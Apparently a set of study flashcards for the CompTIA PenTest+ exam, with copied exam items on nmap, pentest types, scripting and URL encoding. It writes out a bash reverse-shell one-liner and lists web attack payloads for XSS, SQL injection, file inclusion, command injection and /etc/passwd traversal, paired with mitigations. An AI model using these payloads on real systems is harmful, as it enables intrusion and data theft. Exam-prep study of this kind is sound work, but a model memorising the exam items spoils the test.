Need2Know Flashcards
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
opens a remote shell to 192.168.0.1:80
SIMULATION -
You are a penetration tester running port scans on a server.
INSTRUCTIONS -
Part1: Given the output, construct the command that was used to generate this output from the available options.
Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
- nmap -sV -O –top-ports 100 192.168.2.2
So you can see in the output it says “OS and Service detection performed” ( aka -sV and -O)
by default nmap scans the top 1000 ports so they had to specifiy –top-ports 100, it shows 4 ports and at the top of the output says 96 closed ports.
- Null session attack & weak smb file permissions.
The art of packet crafting can be divided into four phases
packet….
- assembly
- editing
- play
- decoding
Goal-based Pentest
attempt to achieve specific goals
Objective Based Pentest
uses all methods - accurately simulates a real attack
Compliance-based pentest
objectives are clearly defined.
Red Team
pentest conducted by internal pentesters during exercise to ensure defenders (Blue Team) can do their jobs
https://www.examtopics.com/exams/comptia/pt0-001/view/4/
- Reflected XSS ————– alert(1)
- Sql Injection Stacked —-.item=widget….%20’00:00:20’; –
- DOM XSS ——————…%3dalert (1) % 3e
- Local File Inclusion —- logfile=%2fetc%2fpasswd%00
- Command Injection – site=www.exa’ping%20-……
- SQLi union —————item=widget%20union…
- SQLi error —————–item=widget+convert…
- Remote File Inclusion -logfile=http:%2f%2fwww.malicious…
- Command Injection — lookup=$(whoami)
- URL redirect————-redir=http:…..
- Input sanitization (<> …)
- Parameterized Queries
- Input Sanitization (<> …)
- sandbox req
- sandbox req
- paramtrized queries
- paramtrized queries
- sandbox
- input saniti $
- prevent external calls
NIST SP 800 Methodology
Planning, Discovery, Attack, Reporting (PDAR)
Given the output from the console above, which of the following explains how to correct the errors in the script? (Select
TWO)
A. Change fi\’ to \‘Endlf
B. Remove the \‘let\’ in front of \‘dest=5+5\’.
C. Change the \’=” to \‘-eq\’.
D. Change -Source* and \‘dest\’ to “$source” and “$dest”
E. Change \‘else\’ to \‘elif.
B,D
URL Encoding
. == %2E
/ == %2F
\ == %5C
eg:
http://www.companysite.com/about.php?i=%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
1 = #1/usr/bin/python 2 = ports = [21,22] 3 = for port in ports: 4 = port_scan(sys.argv[1], ports)
password complexity
Zverlory
zv3rl0ry
Zverl0ry
Zv3r!0ry
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.
nist
nsrt
imdA
strat